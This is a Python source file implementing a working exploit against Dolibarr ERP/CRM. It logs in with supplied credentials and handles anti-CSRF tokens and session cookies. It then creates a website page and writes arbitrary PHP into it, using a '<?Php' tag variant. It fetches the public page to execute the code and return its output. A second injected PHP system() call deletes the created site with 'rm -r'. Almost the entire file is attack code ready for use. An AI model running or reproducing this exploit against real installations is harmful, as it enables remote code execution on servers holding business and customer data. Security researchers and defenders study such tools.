from typing import Any, TextIO, TypeGuard, Union, Callable
from dataclasses import dataclass
from http.cookies import SimpleCookie
import uuid
import sys
import time

import requests
import requests.auth
from furl import furl
from bs4 import BeautifulSoup, Tag
from tenacity import RetryCallState, retry, stop_after_attempt, wait_fixed

from .exceptions import (
    CleanupScriptUploadError,
    PayloadTriggerError,
    CleanupTriggerError,
    CleanupNoOutputError,
    CleanupInvalidExitCodeError,
    PayloadUploadError,
    SiteWasDeletedError,
    TriggerException,
    UploadException,
)
from .logging import log

USER_AGENT = "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36"
SESSION_ID_COOKIE = "DOLSESSID_3dfbb778014aaf8a61e81abec91717e6f6438f92"


def raise_error(retry_state: RetryCallState) -> None:
    if retry_state.outcome is not None:
        exception = retry_state.outcome.exception()
        if exception is not None:
            raise exception


class Exploit:
    target_url: furl
    username: str
    password: str
    site_name: str
    page_name: str
    page_title: str
    proxy: furl | None
    output: TextIO

    session: requests.Session
    pageid: str

    def __init__(
        self,
        target_url: furl,
        username: str,
        password: str,
        site_name: str | None = None,
        page_name: str | None = None,
        page_title: str | None = None,
        proxy: furl | None = None,
        output: TextIO | None = None,
    ):
        self.target_url = target_url
        self.username = username
        self.password = password

        self.site_name = site_name or uuid.uuid4().hex[:12]
        self.page_name = page_name or uuid.uuid4().hex[:12]
        self.page_title = page_title or self.page_name

        self.session = requests.Session()
        self.proxy = proxy
        self.output = output or sys.stdout

    def run(self, payload: str) -> None:
        log.info("Starting exploit.")
        self.session.auth = DolibarrAuth(
            self.target_url, self.username, self.password, proxy=self.proxy
        )
        if self.proxy and self.proxy.scheme in ("http", "https"):
            self.session.proxies = {self.proxy.scheme: self.proxy.url}

        # Create the page that will contain the PHP payload.
        response = self.session.post(
            self.target_url.copy().join("./website/index.php").url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "*/*",
            },
            files={
                "token": (None, "{{token}}"),
                "backtopage": (None, ""),
                "dol_openinpopup": (None, ""),
                "action": (None, "addsite"),
                "website": (None, "-1"),
                "WEBSITE_REF": (None, self.site_name),
                "WEBSITE_LANG": (None, "en"),
                "WEBSITE_OTHERLANG": (None, ""),
                "WEBSITE_DESCRIPTION": (None, ""),
                "virtualhost": (None, f"http://{self.site_name}.localhost"),
                "addcontainer": (None, "Create"),
            },
            allow_redirects=False,
        )
        if response.status_code != 302:
            raise Exception(
                "Unable to create a site on the target.", self.site_name, response
            )
        log.info("New site created on target!", site_name=self.site_name)

        response = self.session.post(
            self.target_url.copy().join("./website/index.php").url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "*/*",
            },
            files={
                "token": (None, "{{token}}"),
                "backtopage": (None, ""),
                "dol_openinpopup": (None, ""),
                "action": (None, "addcontainer"),
                "website": self.site_name,
                "pageidbis": (None, "-1"),
                "pageid": (None, ""),
                "radiocreatefrom": (None, "checkboxcreatemanually"),
                "WEBSITE_TYPE_CONTAINER": (None, "page"),
                "sample": (None, "empty"),
                "WEBSITE_TITLE": (None, self.page_title),
                "WEBSITE_PAGENAME": (None, self.page_name),
                "WEBSITE_ALIASALT": (None, ""),
                "WEBSITE_DESCRIPTION": (None, ""),
                "WEBSITE_IMAGE": (None, ""),
                "WEBSITE_KEYWORDS": (None, ""),
                "WEBSITE_LANG": (None, "0"),
                "WEBSITE_AUTHORALIAS": (None, ""),
                "datecreation": (None, "07/08/2024"),
                "datecreationday": (None, "08"),
                "datecreationmonth": (None, "07"),
                "datecreationyear": (None, "2024"),
                "datecreationhour": (None, "12"),
                "datecreationmin": (None, "09"),
                "datecreationsec": (None, "55"),
                "htmlheader_x": (None, ""),
                "htmlheader_y": (None, ""),
                "htmlheader": (None, ""),
                "addcontainer": (None, "Create"),
                "externalurl": (None, ""),
                "grabimages": (None, "1"),
                "grabimagesinto": (None, "root"),
            },
            allow_redirects=False,
        )
        if response.status_code != 200 or "Website added" not in response.text:
            raise Exception(
                "Unable to create a page on the new site.",
                self.site_name,
                self.page_name,
                response,
            )
        log.info("New page created for the site.", page_name=self.page_name)

        soup = BeautifulSoup(response.text, "html.parser")
        pageid_select = soup.find(id="pageid")
        if not isinstance(pageid_select, Tag):
            raise Exception("Unable to find the page ID after creating the site.")
        selected_option = pageid_select.find(attrs={"selected": True})
        if (
            not isinstance(selected_option, Tag)
            or selected_option.attrs.get("value") is None
        ):
            raise Exception("Unable to find the page ID after creating the site.")
        self.pageid = selected_option.attrs["value"]
        log.info("Found the ID of the page.", id=self.pageid)

        try:
            # Upload the PHP payload.
            self.edit_page(
                f"<?Php {payload} ?>",
                lambda response: PayloadUploadError(payload, response),
            )
            log.info(
                "Edited the new page's content to include your payload.",
                payload=payload,
            )

            # Trigger the payload and log any results.
            log.info(
                "Triggering the payload. This request will hang until the payload finishes running on the target machine."
            )
            time.sleep(1)
            payload_output = self.trigger_payload(
                lambda response: PayloadTriggerError(response)
            )
            if payload_output is not None:
                log.info("Your payload finished, and it had some output.")
                self.output.write(payload_output + "\n")
            else:
                log.warn("Your payload finished, but no output was received.")
        except Exception as error:
            log.exception(error)
        finally:
            # We're done!
            # Now we need to delete the site off of the target.
            log.info("Starting the cleanup process.")
            time.sleep(1)
            try:
                #  rm -r $crm/documents/website/{self.site_name}; echo $?
                self.edit_page(
                    f"<?Php system(\"rm -r $(pwd | sed -e 's:/htdocs/public/website::')/documents/website/{self.site_name}; echo $?\"); ?>",
                    lambda response: CleanupScriptUploadError(self.site_name, response),
                )
                log.info(
                    "Edited the page's content to include a script to clean up the site.",
                    site_name=self.site_name,
                )
            except SiteWasDeletedError:
                log.warn(
                    "Cleanup was interrupted because the site was already deleted."
                )
            else:
                log.info("Triggering the cleanup script...")
                time.sleep(1)
                cleanup_output = self.trigger_payload(
                    lambda response: CleanupTriggerError(response)
                )
                if cleanup_output is None:
                    raise CleanupNoOutputError()
                try:
                    cleanup_exit_code = int(cleanup_output)
                except ValueError:
                    raise CleanupInvalidExitCodeError(cleanup_output)
                if cleanup_exit_code != 0:
                    log.warn(
                        "Cleanup was seemingly not successful.",
                        exit_code=cleanup_exit_code,
                    )
                else:
                    log.info("Cleanup successful!")

            self.session.close()

    def edit_page(
        self,
        payload: str,
        fail_exception: UploadException
        | Callable[[requests.Response], UploadException],
    ) -> None:
        response = self.session.post(
            self.target_url.copy().join("./website/index.php").url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "*/*",
            },
            files={
                "token": (None, "{{token}}"),
                "backtopage": (None, ""),
                "dol_openinpopup": (None, ""),
                "action": (None, "updatesource"),
                "website": (None, self.site_name),
                "pageid": (None, self.pageid),
                "update": (None, "Save"),
                "PAGE_CONTENT_x": (None, "0"),
                "PAGE_CONTENT_y": (None, "0"),
                "PAGE_CONTENT": (
                    None,
                    payload,
                ),
            },
            allow_redirects=False,
        )

        # Success
        if response.status_code == 302:
            return

        if (
            response.status_code == 200
            and "text/html" in response.headers.get("Content-Type", "")
            and "No website has been created yet." in response.text
        ):
            raise SiteWasDeletedError()

        raise (
            fail_exception
            if isinstance(fail_exception, Exception)
            else fail_exception(response)
        )

    @retry(
        stop=stop_after_attempt(3), wait=wait_fixed(1), retry_error_callback=raise_error
    )
    def trigger_payload(
        self,
        exception: TriggerException | Callable[[requests.Response], TriggerException],
    ) -> str | None:
        response = self.session.get(
            self.target_url.copy()
            .join(
                f"/public/website/index.php?website={self.site_name}&pageref={self.page_name}"
            )
            .url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "text/html",
            },
        )

        if response.status_code != 200:
            raise exception if isinstance(exception, Exception) else exception(response)

        soup = BeautifulSoup(response.text, "html.parser")
        if soup.body is None:
            return None

        text = soup.body.text.strip()
        return text if len(text) > 0 else None


class DolibarrAuthState:
    @dataclass
    class Unauthenticated:
        pass

    @dataclass
    class Authenticated:
        token: str
        session_id: str

    @dataclass
    class LoginEvent:
        token: str
        session_id: str

    @dataclass
    class LogoutEvent:
        pass

    type State = Union[Unauthenticated, Authenticated]
    type Event = Union[LoginEvent, LogoutEvent]
    state: State = Unauthenticated()

    def is_authenticated(self, state: State) -> TypeGuard[Authenticated]:
        return isinstance(state, DolibarrAuthState.Authenticated)

    def dispatch(self, event: Event):
        if not self.is_authenticated(self.state) and isinstance(
            event, DolibarrAuthState.LoginEvent
        ):
            self.state = DolibarrAuthState.Authenticated(
                token=event.token, session_id=event.session_id
            )
            log.info(
                "Login successful.",
                token=event.token,
                session_id=event.session_id,
            )
        elif self.is_authenticated(self.state) and isinstance(
            event, DolibarrAuthState.LogoutEvent
        ):
            self.state = DolibarrAuthState.Unauthenticated()
            log.info("You may have been logged out.")
        else:
            raise Exception(f"Invalid event {event} for state {self.state}.")


class DolibarrAuth(requests.auth.AuthBase, DolibarrAuthState):
    """A `requests` custom auth mechanism that logs into Dolibarr ERP/CRM when served the login page, adds the session ID to the `Cookie` header, and replaces any instances of "{{token}}" in the body."""

    base_url: furl
    username: str
    password: str
    proxy: furl | None

    def __init__(
        self, base_url: furl, username: str, password: str, proxy: furl | None = None
    ):
        self.base_url = base_url
        self.username = username
        self.password = password
        self.proxy = proxy
        self.login()

    def __call__(self, request: requests.PreparedRequest) -> requests.PreparedRequest:
        if self.is_authenticated(self.state):
            self.inject_authorization(request)
            request.register_hook("response", self.handle_loggedout)
        return request

    def handle_loggedout(
        self, response: requests.Response, **kwargs: Any
    ) -> requests.Response:
        """Check a response to see if it is a login page or has an unauthenticated/unauthorized HTTP status code. If so, log back in and re-make the request."""
        if (
            self.is_login_page(response)
            or response.status_code == 403
            or response.status_code == 401
        ):
            self.dispatch(DolibarrAuthState.LogoutEvent())

            # Consume content and release original connection to allow our new request to reuse the same one.
            response.content
            response.close()

            # Login so we can remake the request with authorization.
            self.login()
            request = response.request.copy()
            self.inject_authorization(request)

            # Redo the request and return the new response.
            new_response = response.connection.send(request, **kwargs)
            new_response.history.append(response)
            new_response.request = request
            return new_response
        else:
            return response

    def is_login_page(self, response: requests.Response) -> bool:
        if response.status_code != 200 or "text/html" not in response.headers.get(
            "Content-Type", ""
        ):
            return False

        title = BeautifulSoup(response.text, "html.parser").find("title")
        if not isinstance(title, Tag):
            return False

        return "Login" in title.get_text(strip=True)

    def inject_authorization(self, request: requests.PreparedRequest) -> None:
        """Updates the provided request with the anti-CSRF token and the session ID."""
        assert isinstance(self.state, DolibarrAuthState.Authenticated)

        if "Cookie" not in request.headers:
            request.headers["Cookie"] = ""
        cookies = SimpleCookie(request.headers["Cookie"])
        cookies[SESSION_ID_COOKIE] = self.state.session_id
        request.headers["Cookie"] = "; ".join(
            map(lambda morsel: f"{morsel.key}={morsel.value}", cookies.values())
        )

        if isinstance(request.body, str):
            request.body = request.body.replace("{{token}}", self.state.token)
        elif isinstance(request.body, bytes):
            request.body = request.body.replace(b"{{token}}", self.state.token.encode())

        if "Referer" in request.headers:
            request.headers["Referer"] = request.headers["Referer"].replace(
                "%7B%7Btoken%7D%7D", self.state.token
            )

    def login(self) -> None:
        """Logs into the target site and retrieves the anti-CSRF token and session ID."""
        # Get the anti-CSRF token and the session ID.
        session = requests.Session()
        if self.proxy and self.proxy.scheme in ("http", "https"):
            session.proxies = {self.proxy.scheme: self.proxy.url}

        response = session.get(
            self.base_url.copy().join("./index.php").url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "text/html",
            },
        )
        if response.status_code != 200:
            raise Exception(
                f"Failed to retrieve the target site. Received status code {response.status_code}.",
                response,
            )
        token = self.extract_anticsrf_token(response)
        session_id = self.extract_session_id(response)

        # Login and retrieve authenticated anti-CSRF token.
        response = session.post(
            self.base_url.copy().join("./index.php?mainmenu=home").url,
            headers={
                "User-Agent": USER_AGENT,
                "Accept-Encoding": "gzip, deflate, br",
                "Accept": "text/html",
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": f"{SESSION_ID_COOKIE}={session_id}",
            },
            data={
                "token": token,
                "actionlogin": "login",
                "loginfunction": "loginfunction",
                "backtopage": "",
                "tz": "-5",
                "tz_string": "America/New_York",
                "dst_observed": "1",
                "dst_first": "2024-03-10T01:59:00Z",
                "dst_second": "2024-11-3T01:59:00Z",
                "screenwidth": "1050",
                "screenheight": "965",
                "dol_hide_topmenu": "",
                "dol_hide_leftmenu": "",
                "dol_optimize_smallscreen": "",
                "dol_no_mouse_hover": "",
                "dol_use_jmobile": "",
                "username": self.username,
                "password": self.password,
            },
            allow_redirects=True,
        )
        if self.is_login_page(response):
            raise Exception(
                f"Login with credentials user={self.username} pass={self.password} failed.",
                response,
            )
        token = self.extract_anticsrf_token(response)
        self.dispatch(DolibarrAuthState.LoginEvent(token, session_id))

    def extract_anticsrf_token(self, response: requests.Response) -> str:
        """Extracts the anti-CSRF token from a response from the response."""
        soup = BeautifulSoup(response.text, "html.parser")
        meta = soup.find("meta", attrs={"name": "anti-csrf-newtoken"})
        if not isinstance(meta, Tag):
            raise Exception(
                "Anti-CSRF token not found. Please check your URL.", soup.text, response
            )

        token = meta.attrs.get("content")
        if token is None or len(token) == 0:
            raise Exception(
                "Anti-CSRF meta tag was found but was empty.", soup.text, response
            )

        return token

    def extract_session_id(self, response: requests.Response) -> str:
        """Extracts the DOLSESSID_3dfbb778014aaf8a61e81abec91717e6f6438f92 cookie from the response."""
        if SESSION_ID_COOKIE not in response.cookies:
            raise Exception(
                "Unable to get session ID (DOLSESSID) from the target. Please double-check the target URL."
            )
        return response.cookies[SESSION_ID_COOKIE]
